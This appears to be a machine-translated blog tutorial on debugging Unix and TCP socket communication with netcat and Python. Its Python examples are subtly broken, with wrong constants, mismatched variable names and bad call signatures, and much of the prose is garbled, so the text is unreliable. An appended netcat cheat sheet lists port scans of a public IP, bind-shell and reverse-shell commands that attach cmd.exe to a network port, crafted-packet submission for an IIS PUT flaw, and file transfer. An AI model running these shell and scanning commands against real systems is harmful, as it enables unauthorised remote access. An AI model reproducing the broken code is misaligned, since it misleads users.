Debugging Debug method for socket communication between processes in Linux

In a complex software system, it is often necessary to have the data between the various components, in the process of data transfer between components, there will inevitably be some small problems, this time we need to debug, Because a recent system used COLLECTD and rrdcached to collect data and draw, they used UNIX socket communication, so they learned a little bit about the knowledge.

First of all, let's recall the following Linux process communication methods:

piping (pipe) and famous pipes ( FIFO) \unix BSD

signal (Signal) \unix BSD
Message Queuing ( Message) \unix System V
semaphore (Semaphore) \unix System V
Shared Memory \unix system V
socket (socket)

We are familiar with pipelines and signals, the common "|", "kill-9" in the shell, and the pipeline is more used for one-way affinity processes. Message Queuing is less exposed, but should be used in the same way as AMQP, sending and receiving through the relay, without blocking the process. And the semaphore is more a kind of locking mechanism, which itself will not do the actual data exchange.
So much nonsense, I finally talked about the key scoket. Since the first process communication originates from the single-machine system, the method of mutual recognition of process in the communication process is the process number (PID), and then with the development of the network, this way begins to lag behind, resulting in sokcet communication.
Since the socket communication, there is socket programming, it should be considered to be network programming must learn it ~ the operating system to implement the TCP/IP protocol cluster, using the socket interface to invoke, you can implement TCP, UDP, UNIX socket communication.
Of course, we do not talk about programming this time, only concerned about debug, then the problem is how simple how to come.

Send-side debugging

In the Restapi big line of the today, the application layer of debugging we encountered the most should be HTTP, this is very simple, directly on curl.
curl -d ${postdata} -b ${cookies} http://dizhi

NC article

To the transport layer, we have the Swiss Army knife Netcat in the network tool
NETCAT provides NC commands, with scanning (less than nmap), monitoring, connectivity and other functions
Connect a UNIX socket on this computer and execute directly
nc -U /dev/shm/rrdcached.sock
You can start sending messages to this socket.

Note: Netcat-openbsd supports UNIX sockets and distinguishes between UNIX stream sockets and UNIX datagram sockets

nc -U /tmp/socket  
#Connect to UNIX-domain stream socket

nc -uU /tmp/socket 
#Connect to UNIX-domain datagram socket

Python article

Python socket library for client-side functionality
A simple five-step process:

Create a socket

connect to server port or file
send data
receive return
Close connection

Very simple, very suitable for debugging AH

import socket

host=‘‘
port=‘‘

#create
sockets = socket.socket(socket.AF_INET, socket.SOCKET_STREAM)

‘‘‘
The function socket.socket creates a socket and returns the socket descriptor, which will be used in related functions later. This function takes two parameters:

Address Family: You can choose AF_INET (used for Internet inter-process communication) or AF_UNIX (used for inter-process communication on the same machine)
Type: socket type, can be SOCKET_STREAM (stream socket, mainly used for TCP protocol)
Or SOCKET_DGRAM (datagram socket, mainly used for UDP protocol)
‘‘‘

# Create connection

s.connect(host,port)
‘‘‘
If it is a unix socket, here is the corresponding socket file, such as
s.connect("/var/run/rrdcached.sock")
‘‘‘

# send data
s.send(‘STATS’)

# Receive data s.recv(10240

# Close the connection s.close

Receive Side Debug NC Chapter

Similarly, the receiving side can also use the NC listening port to disguise the server side.

Nc-lu/var/tmp/dsocket

Python article

The same few steps:

• Creating a Socket instance

• Bind port or socket file

• Start listening.

• Receive data

• Send data

• Close connection
  One more start listening ~

import socket

host = ‘‘
port = ‘‘

#Create socket instance

s = socket.socket(socket.AF_UNIX, socket.SOCKET_STREAM)

#Binding port s.bind(host,port)
‘‘‘
   If it is a unix socket, write the sock file directly, such as
   s.bind("/var/run/rrdcached")
   ‘‘‘
#Start listening
s.listen(5)
‘‘‘
socket.listen(backlog)
Listen for connections made to the socket. The backlog argument specifies the maximum number of
queued connections
and should be at least 0; the maximum value is system-dependent (usually 5), the minimum value is forced to 0.
‘‘‘

# Receive data
connecttion,address = socket.accept()
‘‘‘
socket.accept()
Accept a connection. The socket must be bound to an address and listening for connections.
The return value is a pair (conn, address) where conn is a new socket object usable
to send and receive data on the connection,
and address is the address bound to the socket on the other end of the connection.
‘‘‘
print "%s"%connection.recv(1024)

# send data
connection.send("success")

# Close connection
connection.close

Master the two commonly used simple debugging means, is not feeling much more relaxed ~

Reference:

• Https://docs.python.org/2/library/socket.html

• Http://www.cnblogs.com/hazir/p/python_socket_programming.html

• Http://www.oschina.net/translate/linux-netcat-command

• http://blog.csdn.net/hguisu/article/details/7445768/

Attach NC commands commonly used

[Command] nc -v ip port

[Example] nc -v 96.44.174.9 80

[Explanation] Scan a certain port of a certain IP, and return the detailed output of the port information.

[Command] nc -v -z ip port-port

[Example] nc -v -z 96.44.174.9 80-1024

[Explanation] Scan the port segment of a certain IP and return the detailed output of the port information, but the scanning speed is very slow.

[Command] nc -v -z -u ip port-port

[Example] nc -v -z -u 96.44.174.9 25-1024

[Explanation] Scan a certain UDP port segment of a certain IP, and return the detailed output of the port information, but the scanning speed is very slow.




[Command] nc -l -p 520

[Explanation] Open the TCP 520 port of this machine and monitor the data transmitted on the secondary port.

[Command] nc -l -v -p 520

[Explanation] Open the TCP 520 port of this machine and output the monitored information to the current CMD window. This command is also the basis of the port forwarding shell.

[Command] nc -l -p 520> C:/log.dat

[Explanation] Open the TCP 520 port of this machine and output the monitored information to the log file under C:/log.dat.

[Command] nc -nvv 192.168.1.101 520 [Explanation] 520 connected to the 192.168.1.101 host.

Key point one (forward connection):

[Remote operation] nc -l -p 2012 -t -e C:WINDOWSsystem32cmd.exe

[Local operation] nc -nvv 192.168.1.101 2012

[Explanation] Using forward connection mode, remote host (Note: assuming the IP address is 192.168.1.101)
Run nc -l -p 2012 -t -e cmd.exe on it means to bind the CMD of the remote host to the 2012 port,
When the local host successfully connects to the remote host, it will return a CMD Shell to the local host;
Run nc -nvv 192.168.1.101 2012 on the local host to connect to the remote host that has redirected CMD to the 2012 port
(Note: It is assumed that the IP address is 192.168.1.101).

Key point two (reverse connection):

[Local operation] nc -l -vv -p 2012
[Remote operation] nc -t -e C:WINDOWSsystem32cmd.exe 192.168.1.102 2012

[Explanation] In the reverse connection mode, first run nc -l -vv -p 2012 on the local host (with public IP) to open the 2012 port and listen for the remote host to connect;
Run nc -t -e cmd.exe 192.168.1.102 2012 on the remote host to change the CMD of the remote host
Redirect to the host with IP address 192.168.1.102 and port number 2012,
After the connection is successful, the host with IP address 192.168.1.102 will get a CMD
 Shell.
 
 

[Command] nc -vv www.91ri.org port <C:/http.txt

[Example] nc -vv www.91ri.org 80 <C:/http.txt

[Explanation] Submit the data package in http.txt, but you can track the process.
For example, IISput vulnerabilities can be used to submit custom data packets using this method.

[Command 1] nc -v -n ip port <C:/sunzn.exe

[Command 2] nc -v -l -p port> D:/sunzn.exe

[Explanation] To run nc -v -n ip port <C:/sunzn.exe locally means to read the content of the sunzn.exe file from the root directory of the local C drive.
And send these data to the corresponding port of the remote host (Note: the IP in the command line is the IP of the remote host receiving the file),
Run nc -v -l -p port> D:/sunzn.exe on the remote host, which means to monitor the corresponding port and write the received information data to D:/sunzn.exe,
Two lines of commands realize the file transfer between the local host and the remote host. 

This article is from the "Danielqu" blog, make sure to keep this source http://qujunorz.blog.51cto.com/6378776/1942670

Debugging Debug method for socket communication between processes in Linux